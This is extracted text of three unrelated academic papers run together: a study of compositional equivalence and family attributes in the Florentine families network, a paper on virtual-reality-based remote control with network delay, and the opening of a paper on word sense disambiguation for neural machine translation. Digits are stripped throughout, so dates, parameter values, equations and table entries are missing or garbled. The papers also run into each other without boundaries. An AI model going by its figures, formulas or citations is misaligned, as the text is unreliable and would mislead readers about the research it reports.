product of the actors’ views of their neighbours’ relations in terms of inclusions, and then we perform the modelling to produce the network positional system to an a posteriori analysis of the network role structure. . constructing person hierarchies applying ce in the reduction of a multiplex network structure implies the construction of the relation-box, which provides the basis of the local part of this type of correspondence. recall that the relation-box is defined by the number of connections compositional equivalence | volume | issues & | insna.org figure : multigraph of the florentine families network solid edges are marriage relations, dashed edges are business ties, and node size reflects their financial wealth. plot made with a force-directed layout of the multigraph r package (ostoic, b). actors in the network and the number of string relations that make up the actors’ immediate social ties and eventually the combination of these. then all inclusions from the individual perspectives are combined into a single matrix that stands for the global part of ce. to illustrate the process of constructing person hierarchies we restrict the analysis to the smallest case of the relation-box with no compounds so that for the florentine families network the dimensions are × × . when we look at figure , we see that apart from pucci, the actor of the network with the lowest number of connections is the acciaiuoli family, which is a pendant actor with a single (reciprocated) tie with the medici family. for the direct contacts in the network without compounds, this means that the personal hierarchy of acciaiuoli includes just their immediate neighbour, which is the medici family, and hence the only inclusion in the matrix is a reflexive closure corresponding to this neighbour, while all the other possibilities lack containment. for a two-chain relationship, the person hierarchy of acciaiuoli includes the neighbouring ties of the medici family compositional equivalence connections insna.org | issues & | volume | table : cumulated person hierarchy, , of the florentine families network of social ties, barbadori bischeri castellani guadagni lamberteschi medici pazzii peruzzi salviati tornabuoni acciaiuoli albizzi ridolfi strozzi ginori pucci all computations are made with the multiplex r package (ostoic, c). as well, i.e. the albizzi, barbadori, ginori, pazzi, ridolfi, salviati, and tornabuoni families, and in this case the acciaiuoli family itself. note that longer paths include not just the rest of the members in the component, but also those actors who take part in the partial order structures for generators and shorter compounds. thus for compounds of length , we still see the self-containment for the acciaiuoli family in its person hierarchy. each actor in the network has its own person hierarchy that is based on containing the primitive relations and the compounds until a certain length. however, these hierarchies are aggregated into the – the cumulated person hierarchy – which is a single matrix of inclusions among all the network members. for the florentine families network, the structure of is represented by the universal matrix and it makes no differentiation among the actors until it reaches a chain of relations of length . it is only from chains of relations with length or more that produces a distinction this is disregarding the isolated actor. among the actors that is a product of their particular inclusions expressed in . the partial order structure representing is given in table , and this set of ordering relations has been reported by breiger and pattison ( , p. ). this cumulated person hierarchy presents two categories of actors in the network plus the isolated family. one category corresponds to the actors who contain other network members without being contained in them, whereas the other category groups those who are merely contained in other actors without containing them. the partition of this system almost fits the requirements of structural equivalence, except for the case of the ginori family, which is positioned in the same class as the acciaiuoli, albizzi, ridolfi, and strozzi families, even though this actor is not implicated in any inclusions with the rest of the members in this class other than a self- containment. therefore, the positional system can have either two classes of collective actors plus the isolated actor or four classes with pairwise individual positions connections compositional equivalence | volume | issues & | insna.org in the system. regardless of the option chosen, both reduced arrangements seem to be good representations of the network structure in terms of the patterned social relations, and they serve as the basis for the construction of the role structure of the florentine families network. however, a number of attributes from the actors may play a significant part in the establishment of the network positional system, and hence we continue the rest of the analysis of this network by incorporating actor attributes in the establishment of the network role structure. . incorporating family attributes the core motivation for this paper is to incorporate in the modelling of the network relational structure significant actor characteristics, which do not have a structural character; that is, traits that are inherent to the actors and do not depend directly on their embedment in the network, such as individual centrality measures, dyadic attributes, etc. on the other hand, although actor attributes can be independent variables, they are not ascribed to the actors in the same way as age, gender or other demographic information, but are governed by the action of the actors themselves. the belief is that these kinds of actor attributes should be part of the modelling of the network positional system and also of the establishment of role structure when the attribute has a structural effect. in the case of the banking families, the power and influence of these families in the th century constitute significant characteristics. table gives the wealth and the number of priorates of the florentine families as reported in wasserman and faust ( , p. ), and these two attribute types, either together or naturally, extreme cases, e.g. when all or no actors share the attribute, will not have an influence on the final structure since they are represented by the identity and the null matrix, respectively. individually, are candidates for the modelling of the network positional system and subsequent role structure. for this type of analysis each attribute is represented with an indexed matrix; hence reducing the network structure with the actor attributes resembles the process we just applied to the marriage and business relations with ce, except that now there are additional generators to the social ties representing the attributes. we note in table that each category has two columns, one for the absolute values and another that marks the limits of these values according to a cut-off value. in one case we differentiate the very wealthy families from the ‘modestly’ rich actors in the network by adopting a cut-off value of , lira, which approximates the average of their financial resources. on the other hand, as regards the number of priorates, it seems reasonable to assume that the lack of information implies that these actors did not have a large number of jurisdictions at that time, if at all, and the cut-off lies in the average of the accessible number of priorates that is rounded to . as a result, there are two vectors of binary values that make the diagonal of the indexed matrices representing the actor attributes, which are additional generators for constructing the network relational structure. we continue the analysis of the banking network by applying ce for grouping the actors in the construction of the positional system with actor attributes. the difference is that now the relation- box on which the person hierarchies are based includes the additional generators representing the attribute-based information. since indexed matrices only have information on their diagonals, the different person hierarchies in the network actually, the mean is . , and the lamberteschi family lies in this limit, but rounding the cut-off value to makes more sense for the analysis. compositional equivalence connections insna.org | issues & | volume | table : wealth and number of priorates of the florentine families wealth > number of ⪆ (× lira) priorates (avg.) acciaiuoli albizzi barbadori na bischeri castellani ginori na guadagni lamberteschi medici pazzi na peruzzi pucci ridolfi salviati strozzi tornabuoni na include self-containments whenever the actor has the attribute. for example, while the person hierarchy of acciaiuoli for immediate ties comprises just the medici, with actor attributes it will include the acciaiuoli family itself when because this particular actor is politically very powerful with a number of priorates larger than the average. naturally, the rest of the actors in the network will follow the same logic, and the arrangement of the cumulated person hierarchy will be affected by the different personal views on inclusions, which are restructured due to the presence of actor attributes. figure shows in a graphic mode for the banking network with business and marriage ties together with wealth, number of priorates, and both actor attributes combined. these pictures are lattices known as hasse diagrams, which depict the inclusion levels in the hierarchy where the lower bound elements are contained in the upper bound elements whenever there is a link among them. for instance, in each diagram the inclusion ties of the medici family contain the inclusion ties of the acciaiuoli and the pazzi families, whereas in any of the cases there is a containment relation among these last two actors. it is important to note, however, that although the different levels in the hasse diagrams try to reflect the ranks in the partial order structures, there can be ambiguities in the placements depending on the diagram structure. for example, the guadagni family is always placed in the most intermediary level of the diagrams in figure , but in a couple of cases this actor does not contain any other actor in . likewise barbadori – similar to medici and peruzzi – cover other actors due to their inclusion ties, and this is without being contained by any network member, and perhaps it may be better to depict these actors at the same level in the three cases. all partial orders shown are emerging structures with the smallest value of . this means that there are ‘zeros’ among connected actors in with compounds of such lengths, which allows us to rank classes of actors according to the ce criteria. in the case of the actors' wealth, the structure of remains unaltered after compounds of length , but in the other two cases the cumulated person hierarchies involve a lower number of inclusions with larger . however, connections compositional equivalence | volume | issues & | insna.org shorter chains of relations imply more truthful individual viewpoints than ordered systems with longer compounds, and they are therefore preferred. these diagrams very clearly show that the attributes of the actors, such as their monetary wealth and political power, have an impact on the relational structure of this particular network. if we look at the diagrams in figure , we note that there is a further differentiation in the network in all three cases when considering actor attributes in the modelling. apart from the isolated actors, whose personal hierarchy corresponds to the null matrix, the cumulated person hierarchy for wealth clearly involves three levels, whereas there are five levels in the diagrams for the number of priorates, and for the two attributes together. as a result, the positional system with wealth differentiates three categories of actors plus the isolated node where the largest class in the previous classification is now divided into two categories. thus the personal wealth has a structuring influence in the network, and this makes a lot of sense; the richest actor of the banking network is the strozzi family, which is no longer in the same class as the acciaiuoli, albizzi, and ridolfi families, but is placed in another category with other actors having much more social and financial capital. when we look at the number of priorates there is even more differentiation in than we saw when just considering the wealth of the actors. apart from the families who contain most of the network members, i.e. the actors ‘at the top’ (medici, peruzzi, barbadori), and conversely the actors ‘at the bottom’ (pazzi, acciaiuoli, guadagni) who are contained in the rest of the network component, there is ambiguity with the rest of the actors and they can be classed in different ways. we get a similar picture when both attributes are taken together, as in figure with wealth and priorates, where the ‘top’ and ‘bottom’ actors in the diagram representing remain unambiguously placed, whereas the categories of the actors inbetween require interpretation. theory can guide us in the establishment of the categories in the positional system in the two last cases. we also need to determine which of the resulting role structures that are a product of the positional system provides the best insights into the relational interlock of the multiplex network structure. this task constitutes one of the last steps in the modelling of the system and we look at the reduced relational structures of the banking families’ network. . positional system of the florentine families network the main challenge in establishing the positional system of the network is to find the sets of collective relations that produce the most meaningful network role structure, i.e. a reduced system that provides an insight into the logic of interlock of the network relations. this is typically achieved with the role structure having the smallest possible dimensions. the logic of interlock is a kind of rationality that is shaped by different algebraic constraints expressed in the final relational structure where the different types of ties and the relevant actor attributes are interrelated in this case. although the class membership with the wealth attribute with three defined classes of collective actors seems straightforward, there are ambiguities both as regards the number of priorates and when the two features are combined. such uncertainties arise because a number of actors in the network can be classed in different ways according to their respective locations in the partial order structures of , and for the time being we concentrate our analysis on the two cases where political power is involved. hence, assuming that the isolated actor of the network forms its own class, we need to categorize the eight actors that are neither at the ‘top’ nor at the ‘bottom’ of the compositional equivalence connections insna.org | issues & | volume | hierarchies shown in figure with wealth and priorates, and in both arrangements the placement of the actors at the different levels aims to reflect the set of containments in the partial order structures with an aesthetic representation in the lattice. now we look closer at the inbetween actors in the two hierarchies where political power is involved. from table we obtain the assignment of these families with respect to the two attributes, and the next upper and lower vectors give the categories for wealth and number of priorates, respectively: certainly, one possibility is that all these actors are grouped together into a single class irrespective of their economic or political power, and in this way we have a positional system with three categories of collective actors for both priorates, and also for wealth and priorates. the arrangements of roles for business and marriage are then equal and all the positions are represented by actors who are both very wealthy and powerful in political terms (of course disregarding pucci). this means that the two attribute types are represented in the positional system by identity matrices with no structuring effect in the system of roles. in order to have an effect from wealth and the number of priorates on the role structure, we need to make a differentiation between classes of actors with respect to these attributes, and this is only possible by having characteristic strings not acting as neutral elements in the construction of the semigroup of relations. a straightforward way to achieve a structuring effect of diagonal matrices is that is why barbadori and guadagni, for example, who are unequivocally part of the same class as the top and bottom actors, respectively, are located at intermediary lev- els in the diagram. by separating the actors with ‘ones’ in the intermediate category from the actors with ‘zeros’ in the vector corresponding to this attribute type. hence we end up with a positional system that has four categories of collective actors, and for the number of priorates (the second row), for instance, bischeri, castellani, ginori, lamberteschi and tornabuoni will make their own class. this means that the attribute string is no longer represented by an identity matrix and the semigroup of the role structures for business, marriage, and number of priorates will record different compounds of social roles with class attributes. however, the role structure for priorates (not shown here) ends up being relatively large and complex. conversely, if we model the network relational system with both attributes at the same time, we first differentiate strozzi, which is a very powerful family both politically and economically. second we differentiate castellani and ginori, actors who are neither very wealthy nor have much political power. by grouping the last two actors into a single class we again avoid having the identity matrix, and the role structure of the network in this case has fewer representative strings, which means that we expect a more tractable substantial interpretation of the role interlock than when just considering the priorates. the fact that the role structure gets smaller rather than larger, as one would expect with another generator, is because the two social roles and both class attributes are equated, and the relational structure of the positional system is then based on just two generators. when we equate roles or attributes we get a poorly informative role structure where we need to interpolate the albizz bische castel ginori lamber ridolf salvia strozz tornab connections compositional equivalence | volume | issues & | insna.org figure : hasse diagrams of for the florentine banking network with actor attributes top to bottom: with wealth, ; with number of priorates, ; with wealth and priorates, . plots made with the multiplex (ostoic, c) and rgraphviz packages (hansen et al., ). compositional equivalence connections insna.org | issues & | volume | roles and collective characteristics in the analysis. a third possibility is to combine the business and marriage ties with wealth in the analysis. in this case the class system of actors takes the levels given in the hasse diagram of figure with wealth. the positional system in this case implies that the marriage ties do not follow a particular pattern in the role structure, whereas business ties and wealth role relations follow a core-periphery structure as shown in the matrices below: business marriage wealth there are no ambiguities in the categorisation of actors in the banking network with the financial wealth of the actors, which leads to a univocally substantial interpretation of the role structure for this positional system. however, the main advantage with these generators is that the role structure gets smaller than with the previous two settings, allowing a more transparent interpretation of the role interlock, even though we are aware that a different logic may arise in the role structure when considering the number of priorates. the reader can refer to ostoic ( a) for an extended analysis of the role structure and role interlock of this particular network. discussion the structuring effect of attribute-based information in the reduction of multiplex networks constituted the most significant aspect covered in this paper, where one of the main challenges has been preserving the multiplicity of the different types of tie. in this sense, the notion of compositional equivalence defined by breiger and pattison ( ) allows us to reduce the besides, assigning strozzi in the central class does not affect the role structure at all. network structure without dropping the relational differentiation, and we extend the positional analysis to non-ascribed characteristics of the actors in the network, which are included as generator relations in the form of diagonal matrices. there is a strong belief that attribute-based information enriches the substantial interpretation of the relational structure of the network, and this is so irrespective of whether the relational system is in a reduced or full format. even though the reduction of the network can bring some ambiguities, aggregated structures are more manageable for substantial interpretation of the relational logic in multiplex network structures, which are complex systems by definition. ce has proven to be a valuable option for mid-sized networks; however, theoretical guidance is required both for the selection of the attribute types and for the establishment of the positional system and subsequent role structure. there are still some important issues that need to be accounted for. the first concern deals with directed multiplex networks, in which the application of ce typically requires counting with relational contrast reflected in the transpositions of the ties. a second aspect is the rationale behind relational structures, which is expressed by algebraic constraints governing the system, including sets of equations among strings, hierarchy in the relations, and interrelations between the different types of tie occurring in the network. these aspects are mentioned only briefly here and their treatment is out of the scope of this article. finally, a statistical approach to the modelling is required for larger network structures, and statistical methods for multiplex networks can serve to complement the modelling process either in an early stage of the analysis or by providing relational and role structures having both fixed and random effects with attributes. connections compositional equivalence | volume | issues & | insna.org references boorman, s.a. & white, h.c. ( ). social structure from multiple networks. ii. role structures. amer- ican journal of sociology, ( ), - . breiger, r.l. & pattison, p.e. ( ). cumulated so- cial roles: the duality of persons and their alge- bras. social networks, ( ), - . doreian, p., batagelj, v. & ferligoj, a. ( ). parti- tioning networks based on generalized concepts of equivalence. journal of mathematical sociology, ( ), - . doreian, p., batagelj, v. & ferligoj, a. ( ). gen- eralized blockmodeling. cambridge: cambridge university press everett, m. g. ( ). role similarity and complexity in social networks. social networks, ( ), - . fruchterman, t.m.j. & reingold, e.m. ( ). graph- drawing by force-directed placement. journal of software: practice & experience, ( ), - . hansen, k. et al. ( ). rgraphviz: provides plotting capabilities for r graph objects. r package version . . available at: https://www.bioconductor.org/packages/release/bi oc/html/rgraphviz.html kent, d.v. ( ). the rise of the medici: faction in florence, – . oxford: oxford university press. lorrain, f. & white, h.c. ( ). structural equiva- lence of individuals in social networks. journal of mathematical sociology, ( ), - . ostoic, j.a.r. ( a). algebraic analysis of multi- plex, signed, and affiliation networks. forthcom- ing. new york: john wiley & sons. ostoic, j.a.r. ( b). multigraph: plot and manipu- late multigraphs.r package version . available at: https://cran.r- project.org/package=multigraph ostoic, j.a.r. ( c). multiplex: algebraic tools for the analysis of multiple social networks. r pack- age version . available at: https://cran.r- project.org/package=multiplex padgett, j.f. & ansell, c.k. ( ). robust action and the rise of the medici, – . american journal of sociology, ( ), - . pattison, p.e. ( ) algebraic models for social networks. structural analysis in the social sci- ences. cambridge: cambridge university press. sailer, l. d. ( ). structural equivalence: meaning and definition, computation and application. social networks, ( ), - . wasserman, s. & faust, k. ( ). social network analysis: methods and applications. structural analysis in the social sciences. cambridge: cam- bridge university press. white, d.r. & reitz, k.p. ( ). graph and semi- group homomorphisms on networks of relations. social networks, ( ), - . winship, c. & mandel, m.j. ( ). roles and posi- tions: a critique and extension of the blockmodel- ing approach. sociological methodology, , - . international conference on sensor network and computer engineering (icsnce ) the remote control system based on the virtual reality su xiaohui school of computer science and engineering, xi’an technological university, xi’an china e-mail: @qq.com dong qiyu school of computer science and engineering, xi’an technological university, xi’an china huang mengyao school of computer science and engineering, xi’an technological university, xi’an china xu shuping school of computer science and engineering, xi’an technological university, xi’an china abstract—aiming at the issues of random delay and delay uncertainty of the control information network, a kind of network remote closed-loop control structure based on virtual reality simulation is proposed. the method in accordance with the idea of open-loop system to achieve closed-loop control make the influence of network latency excluded real-time little closed-loop control system of controlled object value and no effect on the characteristics of the controlled object. simulation results show that the structure of the remote control system has good dynamic quality and reduce the impact of network delay aspects to the system dynamics characteristics. it is a reference idea to the remote real-time closed-loop control. keywords-virtual reality; network time-delay; remote control i. introduction the network control system is the extension of the control distance, the long-distance transmission of control signals will inevitably bring about the delay of the signal [ - ]. remote control system with internet based on tcp/ip protocol as a means of information transfer can be achieved the purpose for control equipment connected to any node within the internet at any time, any place [ - ].remote control system based on control information network actually is pulled away the both ends of control system, between the controller and the controlled object across a computer network to do the information transmission, but in such a system, the basic requirements of the control system has not changed, only increased the difficulty of control [ ]. the experiments show that the larger delay produced a certain time delay and uncertainty during transfer in the internet information, which will allow the entire system to control quality seriously deteriorated, and it’s a bottleneck problem of impact the development of remote control technology based on internet [ ]. in order to relief the impact of network latency on system performance, we must seek new control concepts from the basic principles of the control system. an open, interactive and realistic virtual environment created by virtual reality technology make people immersed in virtual reality to make decisions on changes in the environment based on virtual environments provided by virtual reality and to impact the virtual environment [ ]. in the "real" virtual environment, the input is a set of virtual parameters, the output is another set of virtual parameters, the two parameters linked accordance with a set relationship, the operator can respond to the input parameters timely. because the technology has a good "reality" and "forward-looking", this paper used the virtual reality simulation applied to network remote control structures and mailto:xusp @ .com international conference on sensor network and computer engineering (icsnce ) accordance with the idea of open-loop system to achieve closed-loop control make the impact of network latency out of real-time closed-loop control system of the controlled object value. it’s weak effectively the impact of network latency on the performance of the entire control system. ii. the three closed-loop remote control structures based on virtual reality technology a. system architecture transmission delay link of the network makes the time lag existed between remote operations and controlled object, there are difference between the operations can be based on parameters and needs based on the parameters resulting in the decision-making accuracy and the effectiveness of instruction. shown in figure , you can build a virtual operating environment for the remote operator by means of the actual controlled object and its control parameters of simulation model. in this environment, the simulation charged object is located in a remote client and no network transmission delay between the remote operators, the operator can real-time operation to the simulation charged objects. and at the same time the control signals ) ( k , )(k , ) ( k imposed in the simulation charged objects delivery to the actual controlled object over the internet and taken back continually the actual status information ) ( ky , )(ky , ) ( ky of the controlled object, and real-time compare the state of its simulation controlled object to monitor the running state of the actual controlled object. the network delay will produce a similar delay influence for every transfer data, match the appropriate buffer technology can make to maintain continuous for data flow and make the control signal worked on the actual controlled object and taken back to the status signal to maintain a continuous to achieve real-time closed-loop control for the actual controlled object. simulation charged objects remote operator internet actrual charged objects γ(k- )γ(k)γ(k+ )... y(k- )y(k)y(k+ )... virtual reality figure . virtual reality environments structural diagram network latency makes remote real-time control has been limited, how to "real" reflect the actual system running status by means of the system model and operators develop and implement a control command according to the "real" virtual environment is the applications target of virtual reality technology in the remote control. b. application examples of virtual simulation environment in order to describe clearly the application background of virtual reality simulation, we made the application example shown in figure based on the virtual simulation environment. the left half of the figure is the remote operator to create a virtual simulation environment based on virtual reality ideas, including the display part and the control panel part, of course, this is a simple virtual reality environment, obviously, all the advantage of technology allowing operators into the reality and the technology and equipment facilitate operator to make a judgment and final operation can be used to create more complex and better functions virtual reality. the operating handle in the control panel in the figure is only a schematic which mainly used to describe a method based on virtual reality simulation environment remote control. as shown in figure , the schematic is a system for target tracking and the implementation of the fight against by a game controller in the control panel (one can shake the handle on the right control panel), the launch button (two buttons on the left control panel) and control objects in the operation display interface. first of all, the system achieve the control objects and target of virtual reality association to international conference on sensor network and computer engineering (icsnce ) the actual control objects and target, that is virtual reality can be more true response to the physical environment, followed instructions in the control panel to be able to timely apply to the control object of actual environment. in the virtual simulation environment, operator consider only the running state of virtual reality, that is thought the display of the virtual simulation environment such as playing video games operation control object to track the target by game controller, then within the effective range launched the missile pursuit or shooting by launch button. when the target shoot down by players means the actual target has been shot down and task completed. computer network wireless interface targe t control object targe t control object actual control systemdisplay part of virtual simulation environment control panel figure . an application example based on virtual simulation environment iii. the three loop-control structure of virtual simulation environment due to the presence of network delay on the remote control made operator dialogue to the controlled object has time delay, to meet the good characteristics of the controlled object response and real-time closed-loop control of the remote control operator ,a three closed-loop remote control system based virtual reality simulation was proposed on concept of virtual reality which control the both ends namely the operating side and charged object side to create the independent control value closed-loop structure, the dashed box shown in figure as both ends of the dumbbell structure to meet real-time closed-loop control of the actual controlled object and the virtual simulation charged object to control value, connect both ends of located at operating side and dumbbell structure of charged object as a dumbbell handle through the internet, big closed-loop with network delay thereby to build a dumbbell-shaped three closed-loop structure. small closed-loop at dumbbell both ends can be run independently by operators’ instructions and the run command and result can be communicate with each other by middle big closed-loop-dumbbell handle to carry out a comparison of the information, interaction and updates of two little closed-loop system at dumbbells both ends. visibility, in this structure, little closed-loop at dumbbells both ends can be run independently without network delay links, so there is a fast response speed to charged value. the dumbbell handle big closed loop with time delay links can use the actual charged object parameters at one end of the dumbbell structure according to the parameter variations of the both ends at dumbbell to modify continuously running parameters and status of virtual simulation system at the other end of dumbbell structure which make the running state of simulation system and actual system similar or even identical, while operator to virtual simulation running state of one end of system based on dumbbell structure to decide the next control instruction and judge the running state of the charged object and actual object whether identified according by running result of both ends of dumbbell structure, and judge actual system whether running normal in accordance with operating desired way. therefore, in the three closed-loop remote control system, the operator can be give the required control instructions based on virtual simulation system and ultimately achieve the purpose of remote real-time control. see, the key to the system is how to create a virtual closed-loop architecture and network delay model, that is to establish a closed-loop control system of practical charged objects and their parameters, at the same time, to establish another set of the controlled object model as virtual real controlled object, then make the remote control "immersed" in the virtual reality of the controlled object model operate the controlled object model in virtual reality, while sent the operating instructions to the actual controlled object to achieve the purpose of real-time remote control the controlled object. in order to achieve the purpose of real-time control must be sent the state of the actual system into a virtual reality, so that controller can not only be implement real-time operating based on the object model in virtual reality, but also can monitor and compare the international conference on sensor network and computer engineering (icsnce ) actual running state of the actual controlled object constantly to understand three closed-loop remote control system of this dumbbell-shaped whether normal running and the pace of the small closed loop at both ends of dumbbell head whether functioning properly and take the necessary measures in accordance with this result. therefore, the key of the structure is to accurately predict network delay and accurate establish the controlled object model. controller virtual charged object model prediction output prediction delay prediction delay remote controls compare network delay network delay controller charged object actual output remote control terminal figure . dumbbell-shapes’ three loop-closed structure diagram of remote control iv. virtual charged object modeling and simulation build a brushless dc motor remote control virtual simulation environment as shown in figure in accordance m function and simulink simulation module provided with the matlab. the brushless dc motor model used the model provided in the matlab standard library, one of the brushless dc motor due to large air gap ignored the rotor and the stator flux saturation, the magnetic flux as a linear function, and set the brushless dc motor worked in the way of two-phase conduction star-shaped three-phase six-state power supply, its mathematical model in abc phase plane establish a brushless dc the motor mathematical model [ - ]: )] ( [ ''' ccbasbcab s a pirvv l i dt d    ( ) )] ( [ ''' cbabsbcab s b pirvv l i dt d    ( ) )( bac i dt d i dt d i dt d  ( ) )( ''' ccbbaae iiipt   ( ) where, ls-stator coil inductance rs-stator coil resistance ia, ib, ic-a,b,c phase current ' a  , ' b  , ' c  -a, b ,c opposite electromotive force ab v , bc v -line voltage between ab and bc   - rotor angular velocity  - rotor permanent magnet generated flux amplitude at the stator p -pole pair number te-electromagnetic torques mechanical equations: )( me tft jdt d       dt d where, j - sum of inertia of rotor and load f - sum of viscous friction coefficient of rotor and load m t - mechanical torque of shaft international conference on sensor network and computer engineering (icsnce ) figure . schematic diagram of brushless dc motor virtual simulation system random set network delay is . seconds and set the parameters of the motor: sr ( . ohm), ls ( . e- h), flux ( . wb), the top width of trapezoidal wave back-emf ( o), moment of inertia ( . e- j), friction coefficient ( e- f), and pole number ( p). set the network delay is . seconds, a small closed-loop delay . seconds, at t = . seconds add a step input ,and add n.m load torque tm when t = . seconds then simulation, the result shown in figure . to learn more about the transmission delay of network, analyze the impact of transmission delay on both ends of the dumbbell-shaped virtual simulation environment as shown in figure . assume that the simulation of the controlled object and the actual controlled object is exactly the same, the same model shown in figure also on behalf of simulation controlled object and actual controlled object. and step function as input, set to a value of and . seconds of delay link "delay" and "delay respectively, which delay is the delay within the small closed-loop system, where is set to . seconds, you can get the results shown in figure after simulation run. which a diagram shows the control commands r issued from the operator (fine straight line as shown in figure) a direct work on the controlled object without delay, while the output out of controlled object (dotted line) is not extended and out (thick solid line) the delayed output. figure b shows a control command nr issued from the operator after delay work on the controlled object, and the output out n of the controlled object (dotted line) is not delay and out n (thick solid line) was delay again output. which r, out , represent respectively the input and output of the simulation actual controlled object; nr , out n represents input and output of the actual controlled object; out and out n represents the artificial delay output in order to compare the simulation objects and the actual object output in figure . (a) (b) figure . impact of delay links on the system input and output(a)response curve without delay (b) response curve of the input delay international conference on sensor network and computer engineering (icsnce ) a diagram in figure shows speed input r of speed small closed-loop of one end of the dumbbell structure does not contain the of the network delay (thin straight line as shown in the figure), the response values out (dotted line) and out value of the response after the network delay on closed-loop transmission (thick solid line); figure b shows the input r of speed set in the other side of the dumbbell structure after through a large closed-loop network delay (a thin straight line), and response values out of system work on the input (dotted line), and the out of the response through the network closed-loop transmission delay (thick solid line). which the one-way network delay time is . seconds, the delay value can be set by hand in the simulation, of course, can be projection product by the radial basis function network delay model. v. conclusion for the network closed-loop system of human controller as the study object combined with human characteristics as well as the requirements of network closed-loop control system, a method based on virtual reality simulation network remote closed-loop control was proposed. in this control structure, the idea of achieve closed-loop control in accordance with the open-loop system to exclude the impact of network delay on real-time closed-loop control system of the controlled object control value and no effect on the characteristics of controlled object; the charged object remote simulation system based on virtual reality simulation makes the object of fast, real-time remote control has been based; virtual reality simulation system itself constantly updated according with the actual environment changes to ensure that based on the virtual reality remote control has a certain authenticity. simulation results show that the remote control system with this structure has good dynamic quality and reduced the impact of network delay links on the system dynamics characteristics which a reference ideas to the remote real-time closed-loop control. acknowledgment the authors wish to thank the cooperators. this research is partially funded by the project funds in shaanxi province department of education ( jk ). references [ ] du dajun, fen minrui, song yang et al. briefly reviewed and prospects of network control systems [j]. chinese journal of scientific instrument, , ( ): - . [ ] wang xu, wang zhongjie. design of embedded network control system based on tcp / ip protocol stack [j]. system simulation technology, , ( ): - [ ] zhou zude, chen benyuan et al. research of networked control system time delay distribution [j]. control and decision, , ( ): - [ ] guan shou-ping, ying ting. network control system predictive control based on pole placement and time delay error compensation [j]. information and control, , ( ): - . [ ] yang yunhang, li zhizhong, dong wei et al. missile repair training system based on virtual reality [j]. acta armamentarii, , ( ): - [ ] zhuang yah, wang wei, yun wei-ming, “the research and development of network based robot control technology” [j]. robot, , ( ): - . [ ] huang j q, lew is fl, liu k a, “neural predictive control for telerobot swith time delay” [j]. journal of intelligent and robotic systems, , : - . [ ] chen, s, c.f.n. cowan, and p.m. grant, “orthogonal least squares learning algorithm for radial basis function networks”, ieee transactions on neural networks, , vol. ( ): - . [ ] y. kanayama, n. miyake, “trajectov generation for mobile robots”, robotics research, the mit press, vol. , ,pp - . [ ] zhou yuanshen, “ac and dc speed control system and matlab simulation” [m], beijing, china electric power press, integrating weakly supervised word sense disambiguation into neural machine translation xiao pu∗ nuance communications xiao.pu@nuance.com nikolaos pappas idiap research institute nikolaos.pappas@idiap.ch james henderson idiap research institute james.henderson@idiap.ch andrei popescu-belis heig-vd / hes-so andrei.popescu-belis@heig-vd.ch abstract this paper demonstrates that word sense disambiguation (wsd) can improve neural machine translation (nmt) by widening the source context considered when modeling the senses of potentially ambiguous words. we first introduce three adaptive cluster- ing algorithms for wsd, based on k-means, chinese restaurant processes, and random walks, which are then applied to large word contexts represented in a low-rank space and evaluated on semeval shared-task data. we then learn word vectors jointly with sense vectors defined by our best wsd method, within a state-of-the-art nmt sys- tem. we show that the concatenation of these vectors, and the use of a sense selec- tion mechanism based on the weighted av- erage of sense vectors, outperforms several baselines including sense-aware ones. this is demonstrated by translation on five lan- guage pairs. the improvements are more than bleu point over strong nmt base- lines, + % accuracy over all ambiguous nouns and verbs, or + % when scored manually over several challenging words. introduction the correct translation of polysemous words re- mains a challenge for machine translation (mt). although some translation options may be in- terchangeable, substantially different senses of ∗ work conducted while at the idiap research institute. source words must generally be rendered by dif- ferent words in the target language. hence, an mt system should identify—implicitly or explicitly— the correct sense conveyed by each occurrence in order to generate an appropriate translation. for instance, in the following sentence from europarl, the translation of “deal” should convey the sense “to handle” (in french traiter) and not “to cope” (in french remédier, which is wrong): source: how can we guarantee the system of prior notification for high-risk products at ports that have the necessary facilities to deal with them? reference translation: comment pouvons-nous garantir le système de notification préalable pour les produits présentant un risque élevé dans les ports qui disposent des installations nécessaires pour traiter ces produits ? baseline neural mt: [. . .] les ports qui disposent des moyens nécessaires pour y remédier ? sense-aware neural mt: [. . .] les ports qui dis- posent des installations nécessaires pour les traiter ? current mt systems perform word sense disam- biguation implicitly, based on co-occurring words in a rather limited context. in phrase-based statis- tical mt, the context size is related to the order of the language model (often between and ) and to the length of n-grams in the phrase table (seldom above ). in attention-based neural mt (nmt), the context extends to the entire sentence, but transactions of the association for computational linguistics, vol. , pp. – , . action editor: eneko agirre. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. multiple word senses are not modeled explicitly. the implicit sense information captured by word representations used in nmt leads to a bias in the attention mechanism towards dominant senses. therefore, the nmt decoders cannot clearly iden- tify the contexts in which one word sense should be used rather than another one. hence, although nmt can use local constraints to translate “great rock band” into french as superbe groupe de rock rather than grande bande de pierre—thus cor- rectly assigning the musical rather than geological sense to “rock”—it fails to do so for word senses that require larger contexts. in this paper, we demonstrate that the explicit modeling of word senses can be helpful to nmt by using combined vector representations of word types and senses, which are inferred from contexts that are larger than that of state-of-the-art nmt systems. we make the following contributions: • weakly supervised word sense disambigua- tion (wsd) approaches integrated into nmt, based on three adaptive clustering methods and operating on large word contexts. • three sense selection mechanisms for inte- grating wsd into nmt, respectively based on top, average, and weighted average (i.e., attention) of word senses. • consistent improvements against baseline nmt on five language pairs: from english (en) into chinese (zh), dutch (nl), french (fr), german (de), and spanish (es). the paper is organized as follows. in § , we present three adaptive wsd methods based on k-means clustering, the chinese restaurant pro- cess, and random walks. in § , we present three sense selection mechanisms that integrate the word senses into nmt. the experimental details appear in § , and the results concerning the opti- mal parameter settings are presented in § , where we also show that our wsd component is compet- itive on the semeval shared task. § presents our results: the bleu scores increase by about point with respect to a strong nmt baseline, and the accuracy of ambiguous noun and verb transla- tion improves by about %, while a manual eval- uation of several challenging and frequent words shows an improvement of about %. a discus- sion of related work appears finally in § . adaptive sense clustering for mt in this section, we present the three unsupervised or weakly supervised wsd methods used in our experiments, which aim at clustering different oc- currences of the same word type according to their senses. we first consider all nouns and verbs in the source texts that have more than one sense in wordnet, and extract from there the definition of each sense and, if available, the example. for each occurrence of such nouns or verbs in the train- ing data, we use word vec to build word vectors for their contexts (i.e., neighboring words). all vectors are passed to an unsupervised clustering algorithm, possibly instantiated with wordnet definitions or examples. the resulting clusters can be numbered and used as labels, or their centroid word vector can be used as well, as explained in § . this approach answers several limitations of previous supervised or unsupervised wsd methods. on the one hand, supervised meth- ods require data with manually sense-annotated labels and are thus limited to typically small sub- sets of all word types—for example, up to one hundred content words targeted in semeval (manandhar et 